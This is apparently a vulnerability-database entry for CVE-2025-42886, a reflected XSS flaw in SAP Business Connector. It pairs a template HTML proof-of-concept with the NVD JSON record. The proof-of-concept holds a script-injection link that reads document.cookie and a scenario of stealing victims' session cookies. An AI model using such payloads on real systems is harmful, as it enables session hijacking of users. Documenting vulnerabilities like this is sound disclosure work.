CVE-2025-42886

<!-- CVE-2025-42886 Reflected XSS PoC --> <!-- Target: SAP Business Connector --> <!-- This PoC demonstrates the reflected XSS vulnerability --> <!DOCTYPE html> <html> <head> <title>CVE-2025-42886 PoC</title> </head> <body> <h2>CVE-2025-42886 Reflected XSS PoC</h2> <p>Target: SAP Business Connector</p> <h3>Malicious Link:</h3> <a href='https://[TARGET_HOST]/[VULNERABLE_ENDPOINT]?param=<script>alert(document.cookie)</script>' target='_blank'> Click here to test (will execute JavaScript) </a> <h3>Attack Scenario:</h3> <ol> <li>Attacker identifies a vulnerable endpoint in SAP Business Connector</li> <li>Attacker crafts a URL with malicious JavaScript in parameter</li> <li>Attacker tricks authenticated victim into clicking the link</li> <li>Victim's browser executes the injected script</li> <li>Attacker steals session cookies or performs actions on behalf of victim</li> </ol> <script> // Example: Extract session information console.log('Session Cookie:', document.cookie); console.log('This demonstrates the XSS vulnerability'); </script> </body> </html>

{"cve": {"id": "CVE-2025-42886", "sourceIdentifier": "[email protected]", "published": "2025-11-11T01:15:37.200", "lastModified": "2026-01-16T16:53:49.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a Reflected Cross-Site Scripting (XSS) vulnerability in SAP Business Connector, an unauthenticated attacker could generate a malicious link and make it publicly accessible. If an authenticated victim accesses this link, the injected input is processed during web page generation, resulting in the execution of malicious content in the victim's browser context. This could allow the attacker to access or modify information within the victim�s browser scope, impacting confidentiality and integrity, while availability remains unaffected"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sap:business_connector:4.8:*:*:*:*:*:*:*", "matchCriteriaId": "99F0C742-7E03-425D-BCFC-F4683843350F"}]}]}], "references": [{"url": "https://me.sap.com/notes/3665907", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}